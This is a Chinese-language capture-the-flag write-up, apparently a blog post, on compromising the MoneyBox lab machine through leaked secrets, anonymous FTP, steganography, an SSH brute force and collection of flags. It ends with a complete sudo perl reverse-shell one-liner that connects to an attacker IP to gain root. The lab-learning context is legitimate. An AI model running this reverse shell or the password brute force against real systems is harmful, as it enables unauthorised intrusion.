记一次MoneyBox靶场的渗透测试

1. 信息收集阶段

1.1端口扫描:存在21,22,80端口开放

1.2目录扫描:

2. 渗透测试阶段

2.1网页测试

访问blogs

右键源代码发现:

访问这个目录:

右键查看原码:

发现有一个key

        <!..Secret Key 3xtr4ctd4t4 >

2.2 暴露出来的服务测试

        ftp端口可以用匿名用户访问:有一个照片可以下载,下载下来

可能存在隐写内容,使用kali   steghide extract -sf trytofind.jpg发现要输入密码

密码猜测是上面信息泄露的,发现写入了个data.txt

文件夹内容为:

文章内容提示renu的密码强度不高,考虑尝试使用ssh暴力破解

暴力破解为renu用户的密码为987654321

登录用户

文件目录下有一个user1.txt文件,查看文件找到第一个flag

us3r1{F14g:0ku74tbd3777y4}

查看是否存在其他用户,cat etc/passwd

查看/home文件夹下可能存在的其他用户目录

发现一个lily用户

发现同样的目录结构

查看后发现第二个flag us3r{F14g:tr5827r5wu6nklao}

考虑拿到root权限:尝试使用提权,上传木马,使用msf提权模块发现都是失败,并且renu用户不可以使用sudo

renu用户提权失败,尝试使用lily用户提权,查看历史命令

可以发现lily用户进行配置了公私钥,如果配置在了本地,则可以不需要密码直接进行登录

进行尝试发现可以登录,并且可以不使用密码来使用perl

查阅资料得知perl命令可以进行反弹shell,如果是sudo执行的,那么可以猜测,反弹的会是root权限的shell,搜索到反弹shell的命令:

sudo perl -e 'use

Socket;$i="192.168.128.128";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobynam

e("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,"

>&S");open(STDERR,">&S");exec("/bin/sh -i");};'

发现反弹成功且为root权限

进到root用户根目录下使用ls发现没有文件,可能被隐藏起来了,使用ls -a发现root.txt,查看发现第三个flag。

r00t{H4ckth3p14n3t}

3. 总结

       本次靶场发现如下问题:

  1. 网页文件泄露敏感信息
  2. Ftp服务存在匿名用户登录,并且文件中有敏感信息的泄露
  3. ssh服务配置时未进行安全配置,用户存在弱口令
  4. 历史命令没有清除,敏感操作导致信息泄露。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值